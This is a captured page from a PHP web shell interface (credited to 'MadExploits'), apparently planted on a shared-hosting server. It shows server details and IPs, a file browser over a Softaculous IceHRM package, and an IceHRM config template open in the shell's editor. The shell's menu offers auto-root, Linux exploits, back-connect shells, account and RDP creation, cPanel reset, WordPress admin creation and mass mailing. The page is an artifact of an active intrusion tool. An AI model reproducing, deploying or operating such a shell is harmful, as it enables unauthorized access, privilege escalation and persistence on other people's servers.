Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.141.35.27
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
icehrm /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
4.89
KB
-rw-r--r--
config.php
691
B
-rw-r--r--
edit.php
4.19
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
343
B
-rw-r--r--
icehrm.sql
158.54
KB
-rw-r--r--
icehrm.zip
49.07
MB
-rw-r--r--
import.php
3.03
KB
-rw-r--r--
info.xml
2.26
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
3.64
KB
-rw-r--r--
install.xml
1.97
KB
-rw-r--r--
md5
3.46
KB
-rw-r--r--
notes.txt
849
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php ini_set('error_log', 'data/icehrm.log'); define('APP_NAME', 'Ice Hrm'); define('FB_URL', 'Ice Hrm'); define('TWITTER_URL', 'Ice Hrm'); define('CLIENT_NAME', 'app'); define('APP_BASE_PATH', '[[softpath]]/core/'); define('CLIENT_BASE_PATH', '[[softpath]]/app/'); define('BASE_URL','[[softurl]]/web/'); define('CLIENT_BASE_URL','[[softurl]]/app/'); define('APP_DB', '[[softdb]]'); define('APP_USERNAME', '[[softdbuser]]'); define('APP_PASSWORD', '[[softdbpass]]'); define('APP_HOST', '[[softdbhost]]'); define('APP_CON_STR', 'mysqli://'.APP_USERNAME.':'.APP_PASSWORD.'@'.APP_HOST.'/'.APP_DB); //file upload define('FILE_TYPES', 'jpg,png,jpeg'); define('MAX_FILE_SIZE_KB', 10 * 1024);
Close